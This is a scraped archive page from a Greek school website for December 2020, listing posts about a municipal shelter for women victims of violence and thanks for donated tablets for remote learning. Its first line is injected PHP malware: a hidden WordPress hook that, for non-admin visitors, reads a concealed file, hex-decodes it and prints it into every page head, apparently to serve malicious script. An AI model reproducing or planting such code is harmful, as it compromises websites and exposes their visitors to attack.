if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Δεκέμβριος, 2020 |

Monthly Archives: Δεκέμβριος 2020

Ενημέρωση από τον Ξενώνα Φιλοξενίας Γυναικών Θυμάτων Βίας του Δήμου Τρίπολης

Προστασία στο διαδίκτυο-Σεξουαλική κακοποίηση-Ενδοοικογενειακή βία

Ευχαριστήριο προς τον Δήμο Νότιας Κυνουρίας

Οι μαθητές, οι μαθήτριες και το διδακτικό προσωπικό του σχολείου μας εκφράζουν τις θερμές τους ευχαριστίες στον Δήμο Νότιας Κυνουρίας για την ευγενική του πρωτοβουλία και την άμεση κινητοποίησή του προκειμένου να εξασφαλιστούν ηλεκτρονικές συσκευές, ώστε να καλυφθούν τρέχουσες ανάγκες των μαθητών μας στο πλαίσιο της τηλεκπαίδευσης. Για τον σκοπό αυτό ο Δήμαρχος Ν. Κυνουρίας κος Χαράλαμπος Λυσίκατος παραχώρησε προσωρινά (μέχρι την άρση της αναστολής λειτουργίας των σχολείων) στη σχολική μας μονάδα οκτώ (8) συσκευές τάμπλετ.

Ευχαριστήριο για δωρεά ηλεκτρονικού εξοπλισμού

Οι μαθητές, οι μαθήτριες και το διδακτικό προσωπικό του σχολείου μας εκφράζουν τις θερμές τους ευχαριστίες στην Open Real Estate PC και τον γενικό υπεύθυνο, Γρηγόρη Ντάσκα για την ευγενική τους πρωτοβουλία να χορηγήσουν στο σχολείο μας τέσσερα (4) τάμπλετ και ισάριθμες θήκες προστασίας τους, προκειμένου να καλυφθούν τρέχουσες ανάγκες των μαθητών μας στο πλαίσιο της τηλεκπαίδευσης.

Τέτοιες πράξεις προσφοράς και αλληλεγγύης αποκτούν αληθινό νόημα και ουσιαστική αξία και πρέπει να αναδεικνύονται καθώς αποτελούν αχτίδα ελπίδας και αισιοδοξίας στη δύσκολη συγκυρία που βιώνουμε όλοι.

Ευχόμαστε η πράξη αυτή να αποτελέσει οδηγό και παράδειγμα για την ανάληψη παρόμοιων πρωτοβουλιών που τόσο ανάγκη έχει το σχολείο μας.